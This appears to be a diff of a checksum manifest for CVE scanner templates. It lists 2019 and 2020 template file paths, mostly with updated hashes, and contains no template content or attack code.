+http/cves/2019/CVE-2019-10068.yaml:53277d09488ebebc7179623a13fa8d476696c9fa
+http/cves/2019/CVE-2019-10092.yaml:501060feaaf29e6409736ff4719834ae5d249bbc
+http/cves/2019/CVE-2019-10098.yaml:779779c11d2242160bacadc99d6bac94e5b5cbd3
+http/cves/2019/CVE-2019-1010287.yaml:9be533c38a83005237249f00b3960af112657310
+http/cves/2019/CVE-2019-1010290.yaml:352f81e348ce352febe3e1bb1fc584f107d40720
+http/cves/2019/CVE-2019-10232.yaml:1c1e6037d7f614c607fc69f615c2e9de3a072890
+http/cves/2019/CVE-2019-10405.yaml:404434eff84d7e1138c28898776387bab1de15c1
+http/cves/2019/CVE-2019-10475.yaml:895358f8051cd06f10d9fa5adf7cd620e9cc7ddb
+http/cves/2019/CVE-2019-10692.yaml:5c03086eaa2688a2a121e1d2c3f720f32ea2fd2f
+http/cves/2019/CVE-2019-10717.yaml:85e7d0a6ba236feeb3a0ab78c5ac9be519d29a87
+http/cves/2019/CVE-2019-10758.yaml:034f6b66349c5faef01e5145d7b9599ef913f93a
+http/cves/2019/CVE-2019-11013.yaml:f07fc7f30d4d1ce506f7b7948cf5f85acbe9e0d4
+http/cves/2019/CVE-2019-11248.yaml:c4ba901559fd1d284fb17729a459afafce9c7811
+http/cves/2019/CVE-2019-11370.yaml:ad47c9427fad25d75b80abeef4ebabebd5b9eaec
+http/cves/2019/CVE-2019-11510.yaml:17e589b3683131877b2efcc90154bf0bf4fff282
+http/cves/2019/CVE-2019-11580.yaml:8490e17ef1b0df152c95860ef824c290047b976f
+http/cves/2019/CVE-2019-11581.yaml:b7bf7a6a70623f16e407350324d27541bef67b29
+http/cves/2019/CVE-2019-11869.yaml:7906a5135747f2c92a6be897cd96f9c0e87e9a45
+http/cves/2019/CVE-2019-12276.yaml:a571dfefa00ddffa8532aad6e98472c07720838d
+http/cves/2019/CVE-2019-12314.yaml:d546eb5b44226361cdee7e8ea35f343ca3ac004e
+http/cves/2019/CVE-2019-12461.yaml:b38edbee2186f2c0ac41e5cb9e203dba1d7fda55
+http/cves/2019/CVE-2019-12581.yaml:433e6c288a345066398356b4d24ed61cc7684c7f
+http/cves/2019/CVE-2019-12583.yaml:b80cf45a028462b1040ce53f8b0bdea0fe773999
+http/cves/2019/CVE-2019-12593.yaml:f9ed3a626d050247d1150aeb61e7e06aa30860d5
+http/cves/2019/CVE-2019-12616.yaml:bd35332d9f56c19e63e9b3d90fcdd4f4965e36fe
+http/cves/2019/CVE-2019-12725.yaml:0a9c9d7996d8eb062d9a61fe664114f9b2e8441a
 http/cves/2019/CVE-2019-12962.yaml:04dee817ef2ec6dd6614a62f701afb05854805ba
-http/cves/2019/CVE-2019-12985.yaml:3dd07ed56b93b2136b1c811367314a55ce0b2d58
-http/cves/2019/CVE-2019-12986.yaml:6437096c2fcde731d7e2bdbf894714ce0b423771
-http/cves/2019/CVE-2019-12987.yaml:a2f032b68bd4424b116ebb014b1e54e4f69467ac
-http/cves/2019/CVE-2019-12988.yaml:f2b87de933e74eefd0f4458fba9c32e782d4da4b
-http/cves/2019/CVE-2019-12990.yaml:13945959cad6c49c28ec78da8d19e88a093dbb46
-http/cves/2019/CVE-2019-13101.yaml:d7c99e4a571aa83966facd80cbca292561e62fb4
-http/cves/2019/CVE-2019-13392.yaml:64c2d1f7cff478f457a5bcd1651afbd0f33bff7e
-http/cves/2019/CVE-2019-13396.yaml:ef4a1b248b4b79feeaff20800a64944125e89541
-http/cves/2019/CVE-2019-13462.yaml:f885c0339e7df08ec09899681409ae2e5b560b03
-http/cves/2019/CVE-2019-14205.yaml:8dfea8fe2174e013c4f50242f045abfb68cba70b
-http/cves/2019/CVE-2019-14223.yaml:a23d235da82972358cfcc00f5982635b97460446
-http/cves/2019/CVE-2019-14251.yaml:7edc4f66ac05ed419b5881161070211c9201ac8e
-http/cves/2019/CVE-2019-14312.yaml:179910f18f4396d1b0100e294ba512b13ba5dcb8
-http/cves/2019/CVE-2019-14322.yaml:ad9df922056c42d6c859b2691c8a7e7925b03ef3
-http/cves/2019/CVE-2019-14470.yaml:aca097081b7b41629ef2aabd3f1e8e1e011fd041
-http/cves/2019/CVE-2019-14530.yaml:c6200469cf3b2e31e2ee704f2bb4353acef63697
-http/cves/2019/CVE-2019-14696.yaml:a1d7bb621207308965329068ede6a7f4c57eb0f5
-http/cves/2019/CVE-2019-14750.yaml:2c0bfc141f13ebc4d571e235a294a49cb602d796
-http/cves/2019/CVE-2019-14789.yaml:3dd35a98a5495d1fca5129baefea7af21e8610da
-http/cves/2019/CVE-2019-14974.yaml:d4bcf830f2d6e3276b5843a87ddee9a97d03246c
-http/cves/2019/CVE-2019-15043.yaml:c4744da9cb4e3bc7b040643dbd15238c52fdfa38
-http/cves/2019/CVE-2019-15107.yaml:c83f7c0475cf195f012a0d8f4869ab79946cfb1e
-http/cves/2019/CVE-2019-15501.yaml:b2ab3604e33bce5598444b54194473ce649125f2
-http/cves/2019/CVE-2019-15642.yaml:cacf0e5b12e6a4d5a6530f78896562eb693a393c
-http/cves/2019/CVE-2019-15713.yaml:705b92275d5b44b3b12c945bc4f5274bcc4f0848
-http/cves/2019/CVE-2019-15811.yaml:865fbc81a654a0c0b37ddbdc354274b4cbe0e389
+http/cves/2019/CVE-2019-12985.yaml:56ba5d3e9d9bdcd7f70eb114b2f85eb71e088526
+http/cves/2019/CVE-2019-12986.yaml:9bb2a91fa080fe65c9d82a6c9d25110d465c5128
+http/cves/2019/CVE-2019-12987.yaml:4edc04d1768efdfe6bdc01d2dee4410e1aac345d
+http/cves/2019/CVE-2019-12988.yaml:c8697d536964ad3c4406d9c2ea3dc25d280b43ba
+http/cves/2019/CVE-2019-12990.yaml:dc764c8e02dfedf44bb1a40217d50b7844931e3b
+http/cves/2019/CVE-2019-13101.yaml:fdde34218507d54690a8a590c56603e0df08f7bf
+http/cves/2019/CVE-2019-13392.yaml:62ca1ce2a5c74bdfb0ce70315d27dea7e1a17d6a
+http/cves/2019/CVE-2019-13396.yaml:5ccb153a0e2cb93f72ed7f1a8ebefb5495f5b96b
+http/cves/2019/CVE-2019-13462.yaml:8d7decf59eafb6d2f03cee205a23c10447c52fc0
+http/cves/2019/CVE-2019-14205.yaml:188f7de5a654f222b8b71dd7702222df47605473
+http/cves/2019/CVE-2019-14223.yaml:29fedf5c141eb2ee88201a554b1a90ab09f455b6
+http/cves/2019/CVE-2019-14251.yaml:d2d69020e23f6074237cd1132276277390bb562d
+http/cves/2019/CVE-2019-14312.yaml:63f654943f1ad3b56fa117edf96403f4bee1a534
+http/cves/2019/CVE-2019-14322.yaml:5b92182076894a292bae87e70adf5f06da2d0987
+http/cves/2019/CVE-2019-14470.yaml:66cb23d17cd7467db6774be4bb39ee89cd707e51
+http/cves/2019/CVE-2019-14530.yaml:40bfa6aca70f049ca24436a317a25ad1f99c7881
+http/cves/2019/CVE-2019-14696.yaml:0e176fedb24798ab8397c5b608c1f4242c19157c
+http/cves/2019/CVE-2019-14750.yaml:a0f4122e4ea93cb2e01269674d186f25c583ddb5
+http/cves/2019/CVE-2019-14789.yaml:300ddf7dcfb01aa0af7d07e81a63a30029eacbc3
+http/cves/2019/CVE-2019-14974.yaml:0f2943aea61926458dc827a1d5c04e34dc0ad378
+http/cves/2019/CVE-2019-15043.yaml:b676a6cedf2a868db9f3216122090a9e2c7817bb
+http/cves/2019/CVE-2019-15107.yaml:1c3122dcac811692d3e08816b12196fc12b561f3
+http/cves/2019/CVE-2019-15501.yaml:6fe4f5ba3a27ddbd502d87ce3f2beb4fa29c804b
+http/cves/2019/CVE-2019-15642.yaml:2f2676e4b068a3db4eba404cd7be1bb72d5305d4
+http/cves/2019/CVE-2019-15713.yaml:300e1e7a47355f067bef13f649874cbba255ae6b
+http/cves/2019/CVE-2019-15811.yaml:d3af20a4b944a131c57ba657e7a2e154790b4ec4
 http/cves/2019/CVE-2019-15829.yaml:ee08fa53b36e1b84e8d2f83e26d9afa2e9efa9a5
-http/cves/2019/CVE-2019-15858.yaml:0232db53631dab1b6cc21e8ac1a98c8a45083287
-http/cves/2019/CVE-2019-15859.yaml:5abc5a2e20179d2f604231d9764f416b4f1e884c
-http/cves/2019/CVE-2019-15889.yaml:3bbadd3def06056718437fb4d037c181a8561d1f
-http/cves/2019/CVE-2019-16057.yaml:d10f3345030ed7742f9289c26e6a1ab8d8276265
-http/cves/2019/CVE-2019-16097.yaml:66ae0d2a85ba90e86b054bdd3a4752401455fd4d
-http/cves/2019/CVE-2019-16123.yaml:ca4564a35cb8707f34f4feee8293fe88d2ad0368
-http/cves/2019/CVE-2019-16278.yaml:a7be220f2f75d908d32867d7b50ef1ba061969fb
-http/cves/2019/CVE-2019-16313.yaml:44f9bf34045d6958e5b78c2fe65cd68cd163fb2d
-http/cves/2019/CVE-2019-16332.yaml:4daf8ded4d5bb5c5f28a693c3ce87067753bad6a
-http/cves/2019/CVE-2019-16525.yaml:5bec1adcea8f1e48c29d9f308c7322312348ecab
-http/cves/2019/CVE-2019-1653.yaml:fd88847e397e7e16b03727ad5c64cc4855198f92
-http/cves/2019/CVE-2019-16662.yaml:55be756114eac93dab236715dffa2265b7cbe1ff
-http/cves/2019/CVE-2019-16759.yaml:9b50d5248c6f91789e96df12ee988d999023ef2f
-http/cves/2019/CVE-2019-16920.yaml:54b1d61525ab8da787ff3a52d1b2b2695de3b336
-http/cves/2019/CVE-2019-16931.yaml:a9a307589b3220dc34ef6b55a850e4ce34833c2e
-http/cves/2019/CVE-2019-16932.yaml:14ab932c60677c9964d98c494ada800734122310
-http/cves/2019/CVE-2019-16996.yaml:fddc8e175dfcb8b4fe2d13f092699e9163e6440d
-http/cves/2019/CVE-2019-16997.yaml:18580df9a70e5cd92f16750fd0fe723bc79dbba7
-http/cves/2019/CVE-2019-17270.yaml:acaa4c7659496fb9a3ffae7beddda2f80478511e
-http/cves/2019/CVE-2019-17382.yaml:a73ce0411415cb195d6df3a6377f0ab891463636
-http/cves/2019/CVE-2019-17418.yaml:bb026b4ba3861857d66033c7c9ee9df76060de61
-http/cves/2019/CVE-2019-17444.yaml:7c0167454e0b065c6de451058c64a135b946d172
+http/cves/2019/CVE-2019-15858.yaml:fa2f7675bd77e89e17a70c521bcfaf5e2e39ba25
+http/cves/2019/CVE-2019-15859.yaml:1ee89aea21a5397bc93e6c1d0b20df58edd767b6
+http/cves/2019/CVE-2019-15889.yaml:444496d589dd29e382d6880acc0e430df54e51a2
+http/cves/2019/CVE-2019-16057.yaml:b38b4f975c61fedb47788cc6e7f6bbd2219f57a5
+http/cves/2019/CVE-2019-16097.yaml:a4a2295cc692b49b6a72eadf59c3d67629b7d0e6
+http/cves/2019/CVE-2019-16123.yaml:0dc903a49794b7ff8d59db12aaa0ff2a9f8a67b9
+http/cves/2019/CVE-2019-16278.yaml:5b08ed65278ae9222ff6ccf3bab616bf873156b3
+http/cves/2019/CVE-2019-16313.yaml:60a119931ce1929e9225abc4f301e00dfac572a3
+http/cves/2019/CVE-2019-16332.yaml:75ad50aee53cbc20ff7097a678253a774d23c453
+http/cves/2019/CVE-2019-16525.yaml:5ee2b2c819a7741af14908a86e9546721ed06d31
+http/cves/2019/CVE-2019-1653.yaml:76531a770adf815dfcd7db63da4cdb92bfc425eb
+http/cves/2019/CVE-2019-16662.yaml:187d404a5d1837d1fd5c7a400bee848c761bab5f
+http/cves/2019/CVE-2019-16759.yaml:4c0decc838d103b8d27d55b4c9c1ad0d0c9d3649
+http/cves/2019/CVE-2019-16920.yaml:b0adcd84a6a5338cdaa49eda911a8d8a5ea02321
+http/cves/2019/CVE-2019-16931.yaml:5afc1ff1f9f6482de069e43a6dd1936acef62c92
+http/cves/2019/CVE-2019-16932.yaml:7441e19bc37427ee4e4de47c10808b3827555da9
+http/cves/2019/CVE-2019-16996.yaml:7a59e41de1ecc8310272940b70fb7a3f19b4b82c
+http/cves/2019/CVE-2019-16997.yaml:bd32f8e2674394e81c30468b7cbbe2d3fdbf42e9
+http/cves/2019/CVE-2019-17270.yaml:7966b5509933384db224775a39e26635367e1566
+http/cves/2019/CVE-2019-17382.yaml:4528c4b8517d8a2b6057b3ab43919761424087e3
+http/cves/2019/CVE-2019-17418.yaml:f95453cb993c628b3aa3587e9c6b61a49730339c
+http/cves/2019/CVE-2019-17444.yaml:e327752a15c760e7985c1a52213167978eee014c
 http/cves/2019/CVE-2019-17503.yaml:14407d0acda6c6eb6ad577a7ffcfbcabfdf53faa
-http/cves/2019/CVE-2019-17506.yaml:9e6020f685dea0312f260dbe184080defa60d3ff
-http/cves/2019/CVE-2019-17538.yaml:f5dd8e5ba9915c6fa1e37aa4d5c21770cf09d2ca
-http/cves/2019/CVE-2019-17558.yaml:ae29be7d8590aa1d77470ae24be3d7b3a853de71
-http/cves/2019/CVE-2019-17574.yaml:1fa1d503bba0e43459521460f4f3604d2ce37327
-http/cves/2019/CVE-2019-17662.yaml:d790ddbc42dca946a42d2e4a2d67ac824ec85ccd
+http/cves/2019/CVE-2019-17506.yaml:0588d5bee1aab9b7750821138241bc94089db60d
+http/cves/2019/CVE-2019-17538.yaml:dbd6e26a2382aef32c6d89c6929269872f865226
+http/cves/2019/CVE-2019-17558.yaml:db08545d6fb03cafefc589bc01ea050432f9b78d
+http/cves/2019/CVE-2019-17574.yaml:e63556b383a123245b7b4a936fdbc95b4f3cca84
+http/cves/2019/CVE-2019-17662.yaml:18c74a4525e9e602c515fcbd7a4538289515368c
 http/cves/2019/CVE-2019-1821.yaml:7cefe155047e5db29a43ea1f4354d99f5bd3b66d
 http/cves/2019/CVE-2019-18371.yaml:93f52defc65852edb22b34be8efd6b003b83d3b1
-http/cves/2019/CVE-2019-18393.yaml:25e44a6ae8009771763b15d022b170e7e5f41bbc
-http/cves/2019/CVE-2019-18394.yaml:e498958f56916f94567ad6b13bb3350f56287f7f
-http/cves/2019/CVE-2019-18665.yaml:53342452577aa9e2bf70ea11819369d3b6373df1
-http/cves/2019/CVE-2019-18818.yaml:02530637848efb2938f8211cb6de084586b2545e
-http/cves/2019/CVE-2019-18922.yaml:ebc8be4423344924df2a5b63502772b6c847cae6
-http/cves/2019/CVE-2019-18957.yaml:9e93ab581701790a61ad3a2d4e73ce6ae4cc7b7d
-http/cves/2019/CVE-2019-1898.yaml:547355c425007277a11c5d299da8e5614f22c008
-http/cves/2019/CVE-2019-19134.yaml:c32b643ff4452475a4d7c27ead2e105288af2d45
-http/cves/2019/CVE-2019-19368.yaml:de307b0c701a97f5d587b9cacb7ee74450428c09
-http/cves/2019/CVE-2019-1943.yaml:72747f60ec18101f0fc29c9ac87263a8344536ef
-http/cves/2019/CVE-2019-19781.yaml:87592c34fe8cb019fe8a104b5753ff9e9705f2ec
-http/cves/2019/CVE-2019-19824.yaml:bc9ecd015528b00dfabfd32c48f187a716ad2925
-http/cves/2019/CVE-2019-19908.yaml:3cdcec8bedc9a7248c36a705526072bbd527f65d
-http/cves/2019/CVE-2019-19985.yaml:449d48ece1833a098cb7b827c9f815c09b57ce85
-http/cves/2019/CVE-2019-20085.yaml:0f83a7ee67224a6cdb8b8824ebebad80bf340855
+http/cves/2019/CVE-2019-18393.yaml:8c777f9547072d87fb0a43a15e9d081469903926
+http/cves/2019/CVE-2019-18394.yaml:bdc6459cca04184aa91b2d025d0129423447c52e
+http/cves/2019/CVE-2019-18665.yaml:d573abad3500b005bd68d4a052c35907617d7198
+http/cves/2019/CVE-2019-18818.yaml:f38de4afa9c2eef7015197b381722c0e820ef6bd
+http/cves/2019/CVE-2019-18922.yaml:330a4cef1008383c2ac960e35bcae15e64a3e652
+http/cves/2019/CVE-2019-18957.yaml:aacd228f1b2eebaaddfb5fdbed8a07e6d0c080e2
+http/cves/2019/CVE-2019-1898.yaml:e614e18edd9e97eb4dfd276fd21e0e12f9a95272
+http/cves/2019/CVE-2019-19134.yaml:3aaededce28910b5cfe0e1a1c5761cd49d7be3a9
+http/cves/2019/CVE-2019-19368.yaml:78d4c6549a1374b79c8586bdc00b88b77162cb8d
+http/cves/2019/CVE-2019-1943.yaml:37e6f271fe964ef20c8ea807cb0df1bef5c6d89e
+http/cves/2019/CVE-2019-19781.yaml:6cc3fc415efbb50ba0808ff0f2e8abe8fcdf7c03
+http/cves/2019/CVE-2019-19824.yaml:6b0556033a589096f2a13dae773beda419644cd6
+http/cves/2019/CVE-2019-19908.yaml:35a33669e370cc0f6ffeaf5f4f1216e40f857469
+http/cves/2019/CVE-2019-19985.yaml:8a3223b99b80d588d8b739edc6b65b032a63d6e4
+http/cves/2019/CVE-2019-20085.yaml:25857b3cbe7a25b59ed8897116197063921468b6
 http/cves/2019/CVE-2019-20141.yaml:81452521f22f7fd7fe5e856390378a24e7843f70
-http/cves/2019/CVE-2019-20183.yaml:92051ec18c4e1e944b5739b0fe69a7e8a69460a0
-http/cves/2019/CVE-2019-20210.yaml:582b6c495b11e958d361fed41d69422c02df9497
-http/cves/2019/CVE-2019-20224.yaml:8088b2d586e1e9308c5d4805b0d337d1e154605e
-http/cves/2019/CVE-2019-20933.yaml:55b40d06736721f793deb36f66c37edc9523b6ba
-http/cves/2019/CVE-2019-2578.yaml:e630fe6dfe59d147ca81f3690a015cc3874ea257
-http/cves/2019/CVE-2019-2579.yaml:189cf2f1a3de5798b63b5af188bb20606f78d540
-http/cves/2019/CVE-2019-2588.yaml:eddcfdc9cc9b416ccf265ce5cdc547c9623ba08e
-http/cves/2019/CVE-2019-2616.yaml:d3537c736e85b3b68054c883905e549b4a9e7934
+http/cves/2019/CVE-2019-20183.yaml:59b69a0dafde24556ba68903816a03130237de24
+http/cves/2019/CVE-2019-20210.yaml:28e331d5179952c5ea72ed1ec3b681a502693d41
+http/cves/2019/CVE-2019-20224.yaml:4b57468f58bec3572eac6e316f19d5321f0a7adc
+http/cves/2019/CVE-2019-20933.yaml:e3c28fb74b286357176c8a8a9c6a5fe03124e970
+http/cves/2019/CVE-2019-2578.yaml:d9859f18a046c883f5be1c38578c61bd0ec59967
+http/cves/2019/CVE-2019-2579.yaml:691e84d0d8ab8e2b04181eab4dbc20595143314a
+http/cves/2019/CVE-2019-2588.yaml:595cd481716d6f2693ddd1c0fbb752860483317e
+http/cves/2019/CVE-2019-2616.yaml:a9695f3ef2c7955a1177167713717be184de9b02
 http/cves/2019/CVE-2019-2725.yaml:332e11400675ef8de33091aee3ddae6e997307dd
-http/cves/2019/CVE-2019-2729.yaml:7e141e8be71e1f24ce8eb77ebb1a729dec65b527
-http/cves/2019/CVE-2019-2767.yaml:17e86212a12dd035831b43bb83f6d4b492e2b02f
+http/cves/2019/CVE-2019-2729.yaml:a7ef7840f89c60186650ec11a34d1d8732d953e8
+http/cves/2019/CVE-2019-2767.yaml:78afa0439ce5211b8766dfcff702af103d54c6f1
 http/cves/2019/CVE-2019-3396.yaml:acfcf6acc8db5d06fce9109946e0d1fae7c0388b
-http/cves/2019/CVE-2019-3398.yaml:6d04e7251ae30a196c2d0d1001cda7243ca1586b
-http/cves/2019/CVE-2019-3401.yaml:d5b479dc23f407c75b9b41667ca34a1a84071472
-http/cves/2019/CVE-2019-3402.yaml:a25ba7cd879574a6c271dd678233b23d1b6a56d0
-http/cves/2019/CVE-2019-3403.yaml:66a1748ed649df32ce89af658360221692c19674
-http/cves/2019/CVE-2019-3799.yaml:95d7b6d4e7da6613d83cc883fb49cf4bf34aaa8d
-http/cves/2019/CVE-2019-3911.yaml:914e12037fb374434e8704717399863970379f07
-http/cves/2019/CVE-2019-3912.yaml:115fdb4fc7409dd1bfe7a579b372697bc4e904ae
-http/cves/2019/CVE-2019-3929.yaml:c6b5eee9624d074206622b850a7599b5671ae716
-http/cves/2019/CVE-2019-5127.yaml:e2043623ec7de8e241a87a4b5bb23891ada92742
-http/cves/2019/CVE-2019-5418.yaml:a139b667e9921b33f78f0585fdb0b442b0d9193f
-http/cves/2019/CVE-2019-5434.yaml:3b0af87c962400a1203007be0fa5617fa395ea56
-http/cves/2019/CVE-2019-6112.yaml:c58d0fdc5687ea0a2ee4c3a9a3b94bdf88ae8e25
-http/cves/2019/CVE-2019-6340.yaml:ea4eb99b777c6ca5e7bb1868c41edfbf92297506
-http/cves/2019/CVE-2019-6715.yaml:2b5fc3c2deb101fa293bbc093fd35415f032c040
-http/cves/2019/CVE-2019-6799.yaml:8102acc26d900fd14f91556b9fc54400e85adaff
+http/cves/2019/CVE-2019-3398.yaml:0aabef176b63115b87f8a23b1a9552a4b56f7fbc
+http/cves/2019/CVE-2019-3401.yaml:39188fcd2c2379590603330bd011658575ab4ad1
+http/cves/2019/CVE-2019-3402.yaml:b862eb8b13adb20c856dcdd9f8d60a72c899bff2
+http/cves/2019/CVE-2019-3403.yaml:7ba43cd50951e150cc1621ce1da2f40a1589e084
+http/cves/2019/CVE-2019-3799.yaml:84eabdb6ef1e616aef86d2138c9968e9446f182f
+http/cves/2019/CVE-2019-3911.yaml:6d8b517d34889576fa73c1a6e2780be3d92388d8
+http/cves/2019/CVE-2019-3912.yaml:eae144178ad0ffb6ee2d09bc423749130e26bb31
+http/cves/2019/CVE-2019-3929.yaml:b09f6da70a1c26974942e15358ef6c926a14efe2
+http/cves/2019/CVE-2019-5127.yaml:d914b578899b337cd0a795c51673aad75f541e88
+http/cves/2019/CVE-2019-5418.yaml:d7d7e69c34412510e4af55bb95c11a3d6e2fa5cc
+http/cves/2019/CVE-2019-5434.yaml:cd5f31e6718b7d490dfe7bcf55893de7f7828be9
+http/cves/2019/CVE-2019-6112.yaml:1d73991e2bdcb18dd204ef219f2371cd5170933f
+http/cves/2019/CVE-2019-6340.yaml:0fa0958d8b14db1bb785679a01fd0af101f63dfd
+http/cves/2019/CVE-2019-6715.yaml:b2cc8cb6bd2864246b6d944b8fe35c6a7aec95e6
+http/cves/2019/CVE-2019-6799.yaml:5501838b3f36d9bbbf8476000896405cf0facd10
 http/cves/2019/CVE-2019-6802.yaml:4a302f514222dbc94e4c1563cc3a1e0a608d6d5c
-http/cves/2019/CVE-2019-7192.yaml:0c08be70cf1d268a07d86336798f1ab0e4ec4ccc
-http/cves/2019/CVE-2019-7219.yaml:90abe0764b899c371ebe4275c368d283ca6d8697
-http/cves/2019/CVE-2019-7238.yaml:4baa89252522123859c7d91cf2267da7d5f33f34
-http/cves/2019/CVE-2019-7254.yaml:b394c052ce6a157ce0d0d9697659bc32eb77dcb5
-http/cves/2019/CVE-2019-7255.yaml:28e066a3ccb0a8a7fc92e415ab4ac8c9795fec2f
-http/cves/2019/CVE-2019-7256.yaml:4c344e142ef8e2d7ecf3df3a7bdf855710a6a909
-http/cves/2019/CVE-2019-7275.yaml:e6440d884ecc24aea0a0720fe3cacaeffb3c2fca
-http/cves/2019/CVE-2019-7315.yaml:26343f8692992a6b133b936611455a8e4aae0e98
-http/cves/2019/CVE-2019-7481.yaml:7163165c773387273a01d28bc601ad254d534591
-http/cves/2019/CVE-2019-7543.yaml:d91c998a4327c3eb73c1b9b6fdf5e0a7d09ca877
-http/cves/2019/CVE-2019-7609.yaml:b782a405787d237d0d196642fc31ec3c5cd54c23
-http/cves/2019/CVE-2019-8086.yaml:b8998721055117c7b24635fabd677f39fa53057f
-http/cves/2019/CVE-2019-8390.yaml:aba1428c59bab8933784b739f8273e11af6454ca
-http/cves/2019/CVE-2019-8442.yaml:5de6630d8ed56e896bb3ddc732f09478fd76eda5
-http/cves/2019/CVE-2019-8446.yaml:9441d382d1f912a5ce92f3c916ad9d7369023353
-http/cves/2019/CVE-2019-8449.yaml:f3fa1d5f48afcf4ec93a6d8da1dc7a8b17b4b49f
-http/cves/2019/CVE-2019-8451.yaml:37799e68a15df68a047e70fbbb79159dbeef33c9
-http/cves/2019/CVE-2019-8903.yaml:3f34a0d8ad668f0f74d21d7af44add639558744e
-http/cves/2019/CVE-2019-8937.yaml:b6352ba648a1e187937dbd91ff3b085df3f7443a
-http/cves/2019/CVE-2019-8982.yaml:e01d9c352d412d8e915e826cebd7a9dd60718341
-http/cves/2019/CVE-2019-9041.yaml:428c2f43a959b6638a30ca30d6f1f935188028dd
+http/cves/2019/CVE-2019-7192.yaml:21a4d196239173dc547cf909542d0046f69e2955
+http/cves/2019/CVE-2019-7219.yaml:8b8a0417029a1981936dd0225c982e7e04f90b03
+http/cves/2019/CVE-2019-7238.yaml:81c41ce43c0eb2c430c5875077366e4a7f2d2223
+http/cves/2019/CVE-2019-7254.yaml:8bc74c07b250e90448dd7a51f50dedb9b85818e5
+http/cves/2019/CVE-2019-7255.yaml:2b022b4f3816a1b0d8bf36c15674c187e8f2b9b4
+http/cves/2019/CVE-2019-7256.yaml:bfbfb5842df2ee69043e5d78184e68dfaead5287
+http/cves/2019/CVE-2019-7275.yaml:5d56ae716dcf89dbb8d9e582de090c3f86ed62cf
+http/cves/2019/CVE-2019-7315.yaml:b9443b80906636f841b697e1dc65b8c60a0eba69
+http/cves/2019/CVE-2019-7481.yaml:f1a330e7215aa9788fc6a36215150b80cdae734a
+http/cves/2019/CVE-2019-7543.yaml:aebf9b689e0332ee1fc8157ea1e6c7ea7b52d665
+http/cves/2019/CVE-2019-7609.yaml:cc5d8252a5819a8379ca529310554111e3872174
+http/cves/2019/CVE-2019-8086.yaml:603d416fe2a6ba0d8b00db820ee2ac9e715d340c
+http/cves/2019/CVE-2019-8390.yaml:bd8543dfbbed3d81e9c67a8c39e13829a42b3a30
+http/cves/2019/CVE-2019-8442.yaml:e22f01d228f4bb0e1dc2c35e800fbb4b7f693c9d
+http/cves/2019/CVE-2019-8446.yaml:28123fb76fac211c0d17e256f46eb29ca254508b
+http/cves/2019/CVE-2019-8449.yaml:dd9bc2bc241af94349e9fd96c904b4bdf81b3e15
+http/cves/2019/CVE-2019-8451.yaml:5c36053a8d919a7fe13b4da595da1ebb123c2e6e
+http/cves/2019/CVE-2019-8903.yaml:0c97147ea52be83802aa297dbd99b59946ed6ccc
+http/cves/2019/CVE-2019-8937.yaml:f6822b9047726dc534f0b1f32f4904eeaa14b5f1
+http/cves/2019/CVE-2019-8982.yaml:9590d37f3450e68b12d920a2bab6948e262e838c
+http/cves/2019/CVE-2019-9041.yaml:8b6a847e95d598701966298fc2d0ca0218b736a8
 http/cves/2019/CVE-2019-9618.yaml:1ee638878818809497485509391ff5d0d5d574b4
-http/cves/2019/CVE-2019-9670.yaml:8c293140694db0b5b3cd4ace3c30310f2a4e2336
-http/cves/2019/CVE-2019-9726.yaml:ca789825602bb84627b97e73d0626f0aa74f4390
-http/cves/2019/CVE-2019-9733.yaml:62e505f758ad7dab2764d7843ddffdd2a8eb4fa8
-http/cves/2019/CVE-2019-9915.yaml:ab76028400eaa2b25dde1b7957246ddc6e032a41
-http/cves/2019/CVE-2019-9922.yaml:7e2c5b2056b296c2711e5d1b6a0348da466e726b
+http/cves/2019/CVE-2019-9670.yaml:ddc53e8f1afcb1aef29ffc6ccc38d1f924dde66c
+http/cves/2019/CVE-2019-9726.yaml:8bef7fff591580af94509f8c28a035462e8caf34
+http/cves/2019/CVE-2019-9733.yaml:f43a5f7086eadb7a7bf231c719e402fc947bee18
+http/cves/2019/CVE-2019-9915.yaml:8438b3914b0ae60c0669408b6e445df1fb61cf27
+http/cves/2019/CVE-2019-9922.yaml:f05bde3ad4e3311a82a8c0eecb594ae427a9ea97
 http/cves/2019/CVE-2019-9955.yaml:b863683d48fd4e91725ef291fbd0065acf2b02a3
-http/cves/2019/CVE-2019-9978.yaml:44bb982575e58619ed7d8d73a25dc0076817f97c
-http/cves/2020/CVE-2020-0618.yaml:61374be41e5a209d225886020190d506580ec343
-http/cves/2020/CVE-2020-10148.yaml:bf8a7c28d52676bc740b0f8f32fc443fa47dfae5
-http/cves/2020/CVE-2020-10199.yaml:192db8f491c76a4fc0138eda736d5a33c38a17af
-http/cves/2020/CVE-2020-10220.yaml:0690c1e3c393a446853421dc76d14554619b4f8f
-http/cves/2020/CVE-2020-10546.yaml:ba37a2f2db91150a6a0a2f3815b749ef085a62ff
-http/cves/2020/CVE-2020-10547.yaml:887ad0a40b2c07a2e0b26b845852587fce0d771e
-http/cves/2020/CVE-2020-10548.yaml:b720a694f72fa243a029331bb5014d3386342737
-http/cves/2020/CVE-2020-10549.yaml:aa54ade49d5e0039a063c0c2635d62e73942cf09
-http/cves/2020/CVE-2020-10770.yaml:82f780a6da8724161a9da32f4200b603bce39a4f
-http/cves/2020/CVE-2020-10973.yaml:1ef97262c5b74d85af760e78f401ea3d81b68a6c
-http/cves/2020/CVE-2020-11034.yaml:d6050684c64a0db2b19b8e033e4ed5af341c7de2
-http/cves/2020/CVE-2020-11110.yaml:8f4da71cdc049908836e95747fbff0e0c383f7ea
-http/cves/2020/CVE-2020-11450.yaml:7715b8a891768fe8835f9c54b0df2f0c46a60903
-http/cves/2020/CVE-2020-11455.yaml:82b8c7b0beaf2bf9af93cbe1c9f9b8a6834f1643
-http/cves/2020/CVE-2020-11529.yaml:5497695ecbcf48a8adb6b841249900760a55f061
-http/cves/2020/CVE-2020-11530.yaml:067f463c6e29daedb954c0436dead8a16908006f
-http/cves/2020/CVE-2020-11546.yaml:75315e750bef87be108b177ff8d2dbdaa4410e32
-http/cves/2020/CVE-2020-11547.yaml:42aa177ee2b3462962aff16dae16e8a331f31063
-http/cves/2020/CVE-2020-11710.yaml:ed86b2486457e19d36f04125d53dfba827c42bb4
-http/cves/2020/CVE-2020-11738.yaml:60fbe4dc3e53fb9eb3efffc63c8fb6699d3788af
-http/cves/2020/CVE-2020-11798.yaml:1e832d91dc81a4ef2e6ad0a70f3bc6619199628d
-http/cves/2020/CVE-2020-11853.yaml:0c5637e4dd68ce6471efb6471bdbc1ef1417d405
-http/cves/2020/CVE-2020-11854.yaml:6bf8855500b42e61cb7ee7c12471c1c2e1dac5dd
